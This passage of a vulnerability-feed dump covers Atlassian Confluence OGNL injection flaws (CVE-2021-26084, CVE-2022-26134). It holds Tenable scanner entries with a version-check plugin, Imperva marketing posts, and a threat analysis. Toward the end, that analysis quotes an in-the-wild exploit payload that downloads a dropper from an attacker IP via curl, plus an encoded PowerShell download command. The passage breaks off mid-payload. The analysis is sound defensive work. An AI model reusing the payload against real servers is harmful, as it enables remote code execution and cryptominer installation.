instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 6.14.x < 7.4.11 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112962", "href": "https://www.tenable.com/plugins/was/112962", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-10T00:00:00", "type": "nessus", "title": "Atlassian Confluence 7.12.x < 7.12.5 Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-07T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112964", "href": "https://www.tenable.com/plugins/was/112964", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-13T16:30:20", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance. The vulnerable endpoints can be accessed by a non-administrator user or unauthenticated user if 'Allow people to sign up to create their account' is enabled.\n\nThe affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-01T00:00:00", "type": "nessus", "title": "Atlassian Confluence Webwork OGNL Injection", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-08T00:00:00", "cpe": ["cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_112944", "href": "https://www.tenable.com/plugins/was/112944", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-03T04:10:17", "description": "The remote Atlassian Confluence application running on the remote host is affected by an OGNL injection vulnerability that would allow an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance by sending a specially crafted HTTP request.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-09-07T00:00:00", "type": "nessus", "title": "Atlassian Confluence Server Webwork OGNL Injection (CVE-2021-26084)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-08-02T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CVE_2021_26084.NBIN", "href": "https://www.tenable.com/plugins/nessus/153087", "sourceData": "Binary data confluence_cve_2021_26084.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-23T14:50:43", "description": "According to its self-reported version number, the Atlassian Confluence application running on the remote host is prior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection vulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-08-26T00:00:00", "type": "nessus", "title": "Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:atlassian:confluence"], "id": "CONFLUENCE_CONFSERVER-67940.NASL", "href": "https://www.tenable.com/plugins/nessus/152864", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(152864);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2021-26084\");\n script_xref(name:\"IAVA\", value:\"2021-A-0397\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"Atlassian Confluence < 6.13.23 / 6.14 < 7.4.11 / 7.5 < 7.11.6 / 7.12 < 7.12.5 Webwork OGNL Injection (CONFSERVER-67940)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by an OGNL injection vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Atlassian Confluence application running on the remote host is \nprior to 6.13.23, 6.14.x prior to 7.4.11, 7.5.x prior to 7.11.6 or 7.12.x prior to 7.12.5. It is, therefore, affected by an OGNL injection\nvulnerability that would allow an authenticated user, and in some instances an unauthenticated user, to execute\narbitrary code on a Confluence Server or Data Center instance.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version \nnumber.\");\n # https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cb62fdb\");\n script_set_attribute(attribute:\"see_also\", value:\"https://jira.atlassian.com/browse/CONFSERVER-67940\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian Confluence version 6.13.23, 7.4.11, 7.11.6, 7.12.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26084\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Confluence WebWork OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/08/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/08/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:confluence\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"confluence_detect.nasl\");\n script_require_keys(\"installed_sw/confluence\");\n script_require_ports(\"Services/www\", 8080, 8090);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nvar port = get_http_port(default:80);\nvar app_info = vcf::get_app_info(app:'confluence', port:port, webapp:true);\n\nvar constraints = [\n {'fixed_version' : '6.13.23' },\n {'min_version' : '6.14', 'fixed_version' : '7.4.11' },\n {'min_version' : '7.5', 'fixed_version' : '7.11.6' },\n {'min_version' : '7.12', 'fixed_version' : '7.12.5', 'fixed_display' : '7.12.5 / 7.13.0'}\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-07-26T16:46:10", "description": "The **Cyber Defense Awards** in conjunction with [_Cyber Defense Magazine_](<https://www.cyberdefensemagazine.com/>) recently announced the winners of their prestigious annual **Global Infosec Awards for 2022**. We are proud to say that Imperva earned three [**Global Infosec Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>); as _Most Innovative_ for [Application Security](<https://www.imperva.com/products/application-security/>), _Cutting Edge_ for [Cloud Security](<https://www.imperva.com/solutions/securely-move-your-data-to-the-cloud/>), and as a _Market Leader_ for [Data Security](<https://www.imperva.com/products/data-security-fabric/>).\n\nToday, there are more than 4,000 (and counting) cybersecurity companies worldwide. Being singled out in such a crowded field, for three categories, brings enormous satisfaction to us at Imperva. [**Cyber Defense Awards**](<https://cyberdefenseawards.com/global-infosec-awards-for-2022-winners-by-company/>) judges determined that only 10% of cybersecurity companies worldwide deserve these prestigious awards, making the multiple recognition that much more exciting.\n\nIt gives us great pleasure to see our accomplishments recognized and celebrated as winners by [**Cyber Defense Awards**](<https://cyberdefenseawards.com/>), now in their 9th year. It is even more gratifying to know that this renowned body of judges believes our unique people, software, hardware, and solutions can help users get one step ahead of the next cybersecurity threat.\n\nIn this post, we\u2019ll provide an overview of each of the award-winning solutions and offer some insight into why they stand head and shoulders above others in the respective peer groups.\n\n## Most Innovative: Imperva Application Security\n\nIn its most effective form, an [application security solution](<https://www.imperva.com/learn/application-security/application-security/>) protects software application code and data against cyber threats. To reach award-winning effectiveness levels, organizations must apply application security during all phases of development, including design, development, and deployment. It is not enough simply to acquire the solution, you must apply it intelligently through the software development lifecycle.\n\nImperva\u2019s [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) stops web application attacks that prevent important transactions and steal sensitive data, with near-zero false positives. Imperva also provides powerful [DDoS attack mitigation](<https://www.imperva.com/products/ddos-protection-services/>) and [advanced bad bot protection](<https://www.imperva.com/products/advanced-bot-protection-management/>) that has proven to be scalable as these types of attacks have become [dramatically larger and more sophisticated](<https://www.imperva.com/blog/shorter-sharper-ddos-attacks-are-on-the-rise-and-attackers-are-sidestepping-traditional-mitigation-approaches/>).\n\nImperva\u2019s Application Security solution has been judged particularly innovative because it also provides continuous [protection of all APIs](<https://www.imperva.com/products/api-security/>) using deep discovery and classification of sensitive data to detect all public, private and shadow APIs, and empowers security teams to implement a positive security model. The solution also offers [runtime protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) that protects applications from [zero-day vulnerabilities](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>), freeing up teams to focus on business logic, without leaving applications exposed to potential exploitation. Finally, the solution [prevents supply chain fraud](<https://www.imperva.com/products/client-side-protection/>) from client-side attacks like formjacking, digital skimming, and Magecart. These features enable users to deploy security at multiple layers and protect applications effectively against different types of attacks.\n\n## Cutting Edge: Cloud Security\n\nImperva&#x27;s SaaS-based Cloud WAF solution is part of an overall edge platform, architected into a single cloud application security and delivery stack. Users benefit from the best website protection available. The solution delivers PCI-compliant, automated security that goes beyond [OWASP Top 10](<https://www.imperva.com/learn/application-security/owasp-top-10/>) coverage, with the comprehensiveness to reduce the risks that using third party code creates, plus integrated analytics.\n\n[Imperva\u2019s Cloud WAF](<https://www.imperva.com/resources/resource-library/datasheets/imperva-cloud-waf/>) operates as a secure reverse proxy in the cloud alongside our other security services, with our globally distributed content delivery network as its backbone. After a simple DNS change to route your traffic through the Imperva network, we\u2019re able to inspect each and every request sent to the millions of applications and IPs on our network and to filter out any kind of malicious activity at any point of presence (PoP) in our network.\n\nDifferent attack vectors require different mitigation capabilities, and Imperva has built cutting-edge capabilities purpose-built for every kind of attack vector, and proprietary client classification algorithms that enable us to maintain the most updated signature and IP reputation lists in the industry. At each layer of threat detection, managed with a single set of policies, all attacks are blocked at one time without failover. We pass each event on to our analytics for better insights and recommendations to further improve your security posture.\n\n## Market Leader: Data Security\n\nSince 2020, nearly all organizations with a digital presence have migrated workflows and data to cloud-based environments to develop and innovate faster and cheaper with a largely remote workforce. As more data architectures, both on-premises and cloud-native were added, the number of tools designed to manage data security became unmanageable. The resulting set of disparate tools was supposed to offer complete data security, but in practice did not.\n\n[Imperva Data Security Fabric](<https://www.imperva.com/products/data-security-fabric/>) is a holistic, collaborative, and flexible solution. It is not a data security platform, rather it is a fabric that enables what is called a \u201cconvergence of platforms\u201d where organizations can \u201crapidly amalgamate disparate data security capabilities\u201d to secure data more easily and effectively. No matter where a security threat originates, the volume of an attack, or the place where an attack is being waged, your data and the architectures you use are protected.\n\nAs a market leader, Imperva\u2019s Data Security Fabric provides coverage across multi-cloud, hybrid, and on-premises environments, protects all data sources and types, across structured, semi-structured, and unstructured, and integrates with ecosystem technologies for both incident context and additional data capabilities, unifying visibility, control, automation, and insights via a single data service or dashboard.\n\n## See what the buzz is about\n\nTo learn more about these award-winning solutions, click any of the links in the post. That said, we\u2019d much rather learn about your specific needs and challenges in cybersecurity and determine if we can help. [Contact us](<https://www.imperva.com/contact-us/>) and let\u2019s talk.\n\nThe post [Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022](<https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-26T13:16:19", "type": "impervablog", "title": "Imperva Earns Three Cyber Defense Global InfoSec Awards for 2022", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-26T13:16:19", "id": "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5", "href": "https://www.imperva.com/blog/imperva-earns-three-cyber-defense-global-infosec-awards-for-2022/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-14T17:03:56", "description": "_This is an evolving storyline. \n_**_Last update: June 4, 2022_****_._**\n\nOn June 2, 2022, [Atlassian published a security advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) regarding a CVE for versions of Confluence Server and Data Center applications greater than 1.3.0. The advisory details a critical severity unauthenticated remote code execution vulnerability and is identified as [CVE-2022-26134](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). This Object-Graph Navigation Language (OGNL) injection allows an unauthenticated user to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAtlassian has released a patch for CVE-2022-26134 and is recommending that all Confluence customers deploy this patch immediately to bring them up [to the latest long-term version available](<https://www.atlassian.com/software/confluence/download-archives>). To track the latest information on this vulnerability, Confluence customers are [advised to follow this Jira issue](<https://jira.atlassian.com/browse/CONFSERVER-79016>).\n\nImperva [Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), [WAF Gateway](<https://www.imperva.com/products/web-application-firewall-waf/>), and [Runtime Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) customers are fully protected from CVE-2022-26134 without requiring security rule changes. This protection was validated by the Imperva product team and Imperva Threat Research. \n\nFor Confluence users who haven\u2019t updated their software or cannot update to a long-term supported version at this time, Imperva offers a [free trial of Cloud WAF](<https://www.imperva.com/free-trial/>) that can be **quickly deployed** to protect vulnerable versions of Confluence. \n\n**Imperva Threat Research Analysis of CVE-2022-2613 \n**Since the disclosure, Imperva Threat Research monitored widespread scanning and attempted exploitation of this vulnerability. The uptick can be seen from our analysis below on the number of Java runtime injection attacks over the last 24 hours. \n\nWhat Imperva Threat Research has observed: \n\n\n * 680K attack attempts since June 3rd with attack sources coming from nearly 4k unique IPs. The largest percentage of targets are located in Chile. \n * Payload analysis shows that most of the attacks are scanning attempts to find vulnerable servers. We have identified two scanning approaches:\n * Invoking Java runtime exec function to run the command line program **_nslookup_** that calls an external server (owned by the attacker)\n * Invoking Confluence GeneralUtil **_setCookie_** function to set a unique cookie name and value\n * Imperva saw attempts to deploy a malicious script that operates in two stages:\n * Gains persistence through the modification of the infected server **_crontab_**\n * Downloads an executable file, runs it, and deletes the instance from the file\u2019s system. The malicious file\u2019s goal is to infect the victim server with the Mirai botnet. \n * Imperva Threat Research is seeing many attempts to exfiltrate sensitive data (e.g., dump of **/etc/passwd** file) \n\n\n**Try Imperva for Free \n**Protect your business from vulnerabilities like CVE-2022-26134 and others for free for 30 days. [Click here](<https://www.imperva.com/free-trial/>) to start your free trial today. \n\nThe post [Imperva Customers are protected from Atlassian Confluence CVE-2022-26134](<https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-04T22:05:24", "type": "impervablog", "title": "Imperva Customers are protected from Atlassian Confluence CVE-2022-26134", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-2613", "CVE-2022-26134"], "modified": "2022-06-04T22:05:24", "id": "IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "href": "https://www.imperva.com/blog/imperva-customers-protected-from-atlassian-confluence-cve-cve-2022-26134/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-29T14:37:27", "description": "Ransomware may have dominated headlines in 2021, but it\u2019s only one of many threats security teams must protect against. We\u2019re taking a look back at 5 top cybersecurity stories of 2021 that practitioners wanted to learn more about.\n\n## [5\\. The State of Security in eCommerce](<https://www.imperva.com/blog/by-the-numbers-the-state-of-security-in-ecommerce/>)\n\n### Why you should learn more about this\n\nThe global pandemic has pushed more consumers online and forced the acceleration of growth in eCommerce. The threat landscape for eCommerce websites has never been larger or more complex, with bad bot traffic being the principal problem, accounting for 57% of all attacks on online retail websites in 2021. In addition to stopping ordinary eCommerce transactions, about a third of attacks on web applications on retail websites resulted in data leakage. And with 83% of retail websites running third-party JavaScript-based services executing on the client-side, application developers are creating blind spots in securing the services they need to protect.\n\n### What can eCommerce enterprises do?\n\nIn addition to [Advanced Bot Protection](<https://www.imperva.com/products/advanced-bot-protection-management/>), security practitioners may also consider [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) that provides visibility into JavaScript services executing on a website at any given moment. This solution automatically scans for existing and newly added services, eliminating the risk of them being a blind spot for security. Client-Side Protection enables you to allow approved domains while blocking unapproved ones and ensures your customers\u2019 sensitive information doesn\u2019t end up being transferred to unauthorized locations and that no fraudsters are exploiting your visitors.\n\n## [4\\. How Imperva Is Protecting Customers &amp; Staying Ahead of CVE-2021-44228](<https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/>)\n\n### Why you should learn more about this\n\nCVE-2021-44228 allows for unauthenticated remote code execution and is having a big impact on all organizations running Java workloads. Security teams are scrambling to immediately patch their software and upgrade third-party components to meet SLAs. Initial attack peaks reached roughly 280K/hour and as with other CVEs in its class, we expect to see this number grow, especially as new variants are created and discovered over the coming days and weeks.\n\n### What can security practitioners do?\n\n[Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) (RASP) offers a defense-in-depth strategy for enterprises to protect their applications and APIs on a broad front. Many Imperva customers that have deployed RASP have saved thousands of hours in emergency patching and made their secure software development lifecycle faster. Customers that have RASP deployed across their Java applications are protected from RCEs related to CVE-2021-44228.\n\n## [3\\. The ad blocker that injects ads](<https://www.imperva.com/blog/the-ad-blocker-that-injects-ads/>)\n\n### Why you should learn more about this\n\nAd injection is the process of inserting unauthorized advertisements into a publisher\u2019s web page with the intention of enticing the user to click on them. Ad injectors are often made by scammers trying to make money from application downloads. They can generate revenue for their creators by serving ads and stealing advertising impressions from other websites. With many people spending more time browsing the web, deceptive ad injection is a growing concern. Attackers are constantly refining their tactics, techniques, and procedures.\n\n### What can security practitioners do?\n\nMalicious JavaScript files, including ad injection scripts, are still widespread on the Internet despite worldwide efforts among security practitioners to make the web safer. Imperva [Client-Side Protection](<https://www.imperva.com/products/client-side-protection/>) enables customers to block such malicious JavaScript threats. The solution provides security teams with visibility and insights into the JavaScript-based services running on their websites, as well as the ability to block unwanted services from executing.\n\n## [2\\. Attackers exploit CVE-2021-26084 for XMRig crypto mining on affected Confluence servers](<https://www.imperva.com/blog/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers/>)\n\n### Why you should learn more about this\n\nRemote Code Execution (RCE) vulnerabilities can easily allow threat actors to exploit affected systems for easy monetary gain by installing cryptocurrency miners and masking their activity, thus abusing the processing resources of the target.\n\n### What can security practitioners do?\n\nWith [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>), security practitioners can see a CVEs activity in Imperva Attack Analytics. Also, Given the nature of how [Imperva Runtime Application Self-Protection](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs can be stopped without requiring any code changes or policy updates. Applications of all kinds (active, legacy, third-party, APIs, etc.) are protected when RASP is actively deployed.\n\n## [1\\. 5 elements to include in a cybersecurity strategy for any size business](<https://www.imperva.com/blog/5-elements-to-include-in-a-cybersecurity-strategy-for-any-size-business/>)\n\n### Why you should learn more about this\n\nCybercriminals don\u2019t care how big your business is. If there is a way to separate you from your data or put a wrench in the works of your web applications by launching an automated attack, they will figure out a way to do that. If not directly through your site, then through the software supply chain or through your website visitors. Today, you shouldn\u2019t depend on your developers to build water-tight web application code, your ISP to protect you from a DDoS attack, or your compliance audit checkbox to protect you from a data breach. The threat landscape has progressed far beyond these notions.\n\n### What can security practitioners do?\n\nWe strongly recommend working with [cybersecurity experts](<https://www.imperva.com/contact-us/>) to accurately evaluate your specific threat landscape and help you build a sustainable data security strategy for today and the future.\n\nThe post [2021 in Review, Part 2: 5 Top Cybersecurity Stories](<https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T12:03:19", "type": "impervablog", "title": "2021 in Review, Part 2: 5 Top Cybersecurity Stories", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-29T12:03:19", "id": "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "href": "https://www.imperva.com/blog/2021-in-review-part-2-5-top-cybersecurity-stories/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-13T20:35:04", "description": "## Vulnerability Overview\n\nOn August 25, 2021 [a security advisory was released](<https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html>) for a vulnerability identified in Confluence Server titled \u201cCVE-2021-26084: Atlassian Confluence OGNL Injection\u201d.\n\nThe vulnerability allows an unauthenticated attacker to perform remote command execution by taking advantage of an insecure handling of OGNL (Object-Graph Navigation Language) on affected Confluence servers.\n\nSoon after the publication, various POC/Exploits were published online - at the time of writing this blog there are 32 Github repositories available for CVE-2021-26084.\n\nBesides the publicly available exploits (attempts at executing them were already detected on our systems), Imperva security researchers were able to identify attackers\u2019 attempts to exploit this vulnerability in order to install and run the XMRig cryptocurrency miner on affected Confluence servers running on Windows and Linux systems.\n\n## Analysis\n\n### Attacker Methodology\n\nAs mentioned above we were able to detect payloads targeting Windows and Linux Confluence servers.\n\nIn both cases, the attacker is using the same methodology in exploiting a vulnerable Confluence Server.\n\n * Attacker determines the target operating system and downloads Linux Shell/Windows Powershell dropper scripts from a remote C&amp;C server, and writes them into a writable location on the affected system (under /tmp on Linux and $env:TMP system variable on Windows).\n * Executing downloaded dropper scripts.\n * Dropper Scripts perform the following actions to download, install and execute the XMRig crypto mining files: \n * Removal of competing crypto mining processes and their related files.\n * Establishing persistence by adding a crontab/scheduled task based on the operating system.\n * Download of the XMRig crypto mining files and post-exploitation clean up scripts. The files are written to temporary locations, masked as legitimate services/executables.\n * Starting XMRig mining.\n * Execution of post-exploitation scripts.\n\n### Downloaded Dropper Scripts\n\nThe following malicious payload was observed on our monitoring systems: \nqueryString=aaaaaaaa&#x27;+{Class.forName(&#x27;javax.script.ScriptEngineManager&#x27;) .newInstance().getEngineByName(&#x27;JavaScript&#x27;).eval(&#x27;var isWin = \njava.lang.System.getProperty(&quot;os.name&quot;).toLowerCase().contains(&quot;win&quot;); \nvar cmd = new java.lang.String(&quot;curl -fsSL \nhxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg&quot;);var p = new \njava.lang.ProcessBuilder(); if(isWin){p.command(&quot;cmd.exe&quot;, &quot;/c&quot;, cmd); \n} else{p.command(&quot;bash&quot;, &quot;-c&quot;, cmd); }p.redirectErrorStream(true); var \nprocess= p.start(); var inputStreamReader = new \njava.io.InputStreamReader(process.getInputStream()); \nvar bufferedReader = new java.io.BufferedReader(inputStreamReader); var \nline = &quot;&quot;; var output = &quot;&quot;; while((line = bufferedReader.readLine()) \n!= null){output = output + line + java.lang.Character.toString(10); \n}&#x27;)}+&#x27;\n\nFrom the sample above we see the attacker is attempting to determine the vulnerable server operating system by calling java.lang.System.getProperty(&quot;os.name&quot;):\n\nOnce the operating system is determined, a file is downloaded from a remote source by either using curl as can be seen in the example above or by powershell:\n\nDownload of a Linux Shell dropper script: \nvar cmd = new java.lang.String(&quot;**curl -fsSL hxxp://27.1.1.34:8080/docs/s/26084.txt -o /tmp/.solrg**&quot;);\n\nDownload of a Windows Powershell dropper script: \nvar cmd = new java.lang.String(**&quot;powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC \n4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAo \nACcAaAB0AHQAcAA6AC8ALwAyADcALgAxAC4AMQAuADMANAA6ADgAMAA4ADAALwBkAG8AYw 